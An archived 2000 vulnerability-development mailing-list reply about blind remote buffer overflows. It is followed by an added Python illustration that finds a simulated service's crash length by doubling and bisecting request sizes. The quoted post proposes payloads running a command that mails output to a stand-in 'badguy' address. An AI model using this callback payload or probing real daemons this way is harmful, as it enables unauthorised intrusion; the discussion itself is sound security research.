Vulnerability Development mailing list archives
Re: Blind Remote Buffer Overflow
From: marc () EEYE COM (Marc)
Date: Mon, 1 May 2000 17:36:40 -0700
Since you mentioned eEye... The beta that is on our website does not "scan for unknown exploits." So wait till after May 15th and then give Retina a try; it WILL have CHAM (Common Hacking Attack Method) modules. Retina 1.0 will be able to find the overflows, and Retina 1.2 or 1.5 should be able to find the exact overflow length. We also have plans for shell code inserti... er, well, I can't get into the rest of it. ;-]

Signed,
Marc
eEye Digital Security
http://www.eEye.com

P.S. If anyone is going to Networld+Interop, be sure to check out eEye/eCompany's booth. How will you find us, you ask? We will be the "non-heard-of sheep sporting polo shirts and khakis". We will have black t-shirts on that poke fun at the NSA, dyed hair and tequila. :-]

Hmm, interesting... NSA was not in the default dictionary for MS's spell checker.

| -----Original Message-----
| From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM] On Behalf Of Bluefish
| Sent: Monday, May 01, 2000 6:42 PM
| To: VULN-DEV () SECURITYFOCUS COM
| Subject: Re: Blind Remote Buffer Overflow
|
| Uhm...
|
| To begin with, in most situations it seems inadvisable to assume the attacker is blind. But if he really is?
|
| Some people have mentioned some ways to try to find a vulnerability remotely. Now, let's say you have, by some means, determined that you can rewrite EIP, PC (or whatever it's called on your architecture). What to do now to detect operating system and architecture?
|
| I believe a 'generic buffer overflower' could be part of the answer. Let a tool be given what you know (or guess) about the overflow. Let it generate a number of variants (as an example: Linux/i386, Linux/sparc, Windows/i386), all of which do something like "echo 3 | mail badguy () test com". Depending upon what mail you actually get back, you know that the architecture is at least quite compatible with the environments that return an answer.
|
| It does seem like quite some work, but it does (IMHO) show that even if a system has secret source code and secret binaries as well, it's not possible to provide security through obscurity. If such scans could be automated, it would raise a need even for programs which only exist on a single system to be coded quite well.
|
| The group/company at www.eeye.com has a tool which can be used to scan for unknown exploits if you give it some information about "where you want to go today" (grin). I don't know how good it is, but perhaps support for 'blind overflows' to detect systems can be incorporated into their scanner.
|
| ..:::::::::::::::::::::::::::::::::::::::::::::::::..
| http://www.11a.nu || http://bluefish.11a.nu
| eleventh alliance development & security team
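Editor's added illustration of the "find the exact overflow length" problem Marc refers to above, written for this archive page; it is not Retina code and not anything posted in the thread. The only feedback a blind remote prober gets is whether the service still answers, so the tool has to treat "no reply" as the crash signal. SimulatedService is a constructed stand-in for the target (its buffer size and padding are made up); the prober doubles the request length until the service stops answering, then bisects between the last good and first bad length, repeating each probe so one dropped packet is not mistaken for a crash. It assumes a supervisor respawns the crashed handler between requests, as an inetd- or fork-per-connection daemon would.

```python
"""Blind overflow-length probe (added example, not code from the thread)."""
from dataclasses import dataclass
from typing import Optional


@dataclass
class SimulatedService:
    """Constructed stand-in for the remote daemon, not a real target.

    Layout assumed for the model: `buf_size` bytes of buffer, then `slack`
    bytes of other locals/padding, then the saved return address.  A request
    longer than buf_size + slack overwrites the saved return address and the
    handler dies, which the client observes as "no reply".  A supervising
    parent is assumed to respawn the handler, so every request is independent.
    """
    buf_size: int
    slack: int
    requests: int = 0  # how many probes the target has seen (cost bookkeeping)

    def handle(self, request: bytes) -> bool:
        """True if the service replied, False if it crashed mid-request."""
        self.requests += 1
        return len(request) <= self.buf_size + self.slack


def alive_after(service: SimulatedService, length: int, trials: int = 2) -> bool:
    """Send up to `trials` requests of `length` filler bytes.

    A crash is only believed when every trial went unanswered; a single reply
    is enough to call the service alive.  That keeps a lost packet from being
    misread as a crash, at the price of extra probes near the boundary.
    """
    return any(service.handle(b"A" * length) for _ in range(trials))


def find_overflow_length(service: SimulatedService,
                         start: int = 16,
                         limit: int = 1 << 20) -> Optional[int]:
    """Return the smallest request length that kills the service, or None if
    nothing up to `limit` bytes does.

    Phase 1: double the length from `start` until the service stops answering
             (gives a crashing upper bound in O(log n) probes).
    Phase 2: bisect between the last length that answered and the first that
             did not, until they are adjacent.
    A zero-length request is assumed to be harmless, so `good` starts at 0.
    """
    good, bad = 0, None
    length = start
    while length <= limit:
        if alive_after(service, length):
            good = length
            length *= 2
        else:
            bad = length
            break
    if bad is None:
        return None  # never crashed within the size budget

    while bad - good > 1:
        mid = (good + bad) // 2
        if alive_after(service, mid):
            good = mid
        else:
            bad = mid
    return bad


if __name__ == "__main__":
    svc = SimulatedService(buf_size=64, slack=12)  # constructed numbers
    n = find_overflow_length(svc)
    print(f"smallest crashing length: {n} bytes, found with {svc.requests} requests")
```

With the constructed 64-byte buffer and 12 bytes of padding the prober settles on 77 bytes in about fifteen requests; against a real daemon the same loop would sit behind a socket send/recv with a timeout, and the "alive" test would also have to wait out the respawn delay before the next probe.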
Current thread:
- Re: Blind Remote Buffer Overflow Ex Machina (Apr 30)
- <Possible follow-ups>
- Re: Blind Remote Buffer Overflow Matthew R. Potter (Apr 30)
- Re: Blind Remote Buffer Overflow Arturo Busleiman (Apr 30)
- Re: Blind Remote Buffer Overflow Ralph The Wonder Llama (May 01)
- Re: Blind Remote Buffer Overflow Granquist, Lamont (May 01)
- Re: Blind Remote Buffer Overflow Reinier Heeres (May 02)
- Re: Blind Remote Buffer Overflow Matthew R. Potter (May 02)
- Re: Blind Remote Buffer Overflow Jani Ollikainen (May 02)
- Re: Blind Remote Buffer Overflow Granquist, Lamont (May 01)
- Re: Blind Remote Buffer Overflow Bluefish (May 01)
- Re: Blind Remote Buffer Overflow Marc (May 01)
- Re: Blind Remote Buffer Overflow Blue Boar (May 01)
- Re: Blind Remote Buffer Overflow matej (May 01)
- Re: Blind Remote Buffer Overflow Pavol Luptak (May 02)
- Ascii-x86 was: Blind Remote Buffer Overflow Bluefish (May 03)
- Re: Ascii-x86 was: Blind Remote Buffer Overflow Robert Collins (May 03)
- Re: Ascii-x86 was: Blind Remote Buffer Overflow Bill Weiss (May 03)
- firewall audit LEOW Chiun-Yi Jonathan (May 03)
- Re: firewall audit Ron DuFresne (May 03)
- Re: firewall audit antirez (May 04)
- Re: firewall audit Bennett Todd (May 04)